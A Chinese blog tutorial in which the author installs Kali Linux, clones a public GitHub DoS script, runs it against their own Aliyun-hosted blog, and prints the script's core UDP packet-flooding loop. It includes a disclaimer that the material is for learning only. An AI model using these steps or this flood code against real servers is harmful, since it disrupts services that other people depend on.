对自己的博客网站进行DOS攻击

对自己的博客网站进行DOS攻击

先说明一点,别对别人的网站进行ddos/dos攻击(dos攻击一般短时间攻击不下来),这是违法的,很多都有自动报警机制,本篇博客仅用于学习,请勿用于非法用途

安装kaili Linux

进入KALI官网,下载iso镜像文件

vmware新建虚拟机,选择自定义

点击下一步

点击下一步

点击下一步

选择稍后安装操作系统,点击下一步

选择Debian系统,版本根据自己的kali版本来,我这里就选最新的Debian12,点击下一步

虚拟机名称和存储位置根据自己情况来,点击下一步

处理器配置根据自己电脑的配置来,点击下一步

内存也是根据自己的使用情况来,点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击下一步

点击自定义硬件

导入下载好的ISO文件,关闭后点击完成即可

剩下启动后的配置就比较简单了,根据自己情况来即可

安装完成后打开是这样的:

换源+更新

进入root权限

shell 复制代码
sudo su

输入密码后,换源

shell 复制代码
sudo vim /etc/apt/sources.list

部分国内源:

shell 复制代码
官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
东软大学
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
重庆大学
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

自己选一个换上就行,然后进行更新:

shell 复制代码
sudo apt-get update
DOS攻击

未被攻击前访问我的网站是这样的:

下载Dos数据包

shell 复制代码
git clone https://github.com/Andysun06/ddos

进入ddos文件夹

shell 复制代码
cd ddos

执行python脚本

shell 复制代码
python ddos-p3.py

下面这两张用的是别人的图,不想打码了(雾

反正我攻击了大概8分钟,网站还是可以正常访问的,由于阿里云服务器有一定量的免费的cdn防护,我个人进行DOS攻击至少需要一小时才能耗完.这次只是实验一下,所以就不继续了.

我们可以看到受到攻击后服务器的带宽是有被大量消耗的,说明我们的攻击是有效的.

代码分析

去作者的github上把代码拉下来,看看是怎么写的:

python 复制代码
os.system("clear")
os.system("figlet DDos Attack")
ip = input("请输入 IP     : ")
port = int(input("攻击端口      : "))
sd = int(input("攻击速度(1~1000) : "))

os.system("clear")

sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     print ("已发送 %s 个数据包到 %s 端口 %d"%(sent,ip,port))
     time.sleep((1000-sd)/2000)

核心代码就这么几行,其实就是不断向指定IP的端口发送数据包,然后打印发送数据包的个数.

本人也是初入安全的小白,有什么不对的地方欢迎在评论区指出

相关推荐
大熊程序猿3 分钟前
netcore PowerShell 安装-linux
linux·运维
虚!!!看代码9 分钟前
【Sentinel学习】
网络·sentinel
Johny_Zhao23 分钟前
Docker 一键安装部署 JumpServer 堡垒机
linux·网络安全·信息安全·云计算·shell·jumpserver·ldap·yum源·系统运维
liulilittle24 分钟前
VGW 虚拟网关用户手册 (PPP PRIVATE NETWORK 基础设施)
开发语言·网络·c++·网关·智能路由器·路由器·通信
网硕互联的小客服25 分钟前
服务器如何配置防火墙规则以阻止恶意流量和DDoS攻击?
服务器·网络·ddos
AIbase202427 分钟前
国内MCP服务平台推荐!aibase.cn上线MCP服务器集合平台
运维·服务器·人工智能
Qiq92228 分钟前
怎么分析内网ipv6和ipv4流量占比?
网络
数通Dinner39 分钟前
P/A初始化协商
网络
网安小白的进阶之路39 分钟前
A模块 系统与网络安全 第三门课 网络通信原理-3
网络·windows·安全·web安全·系统安全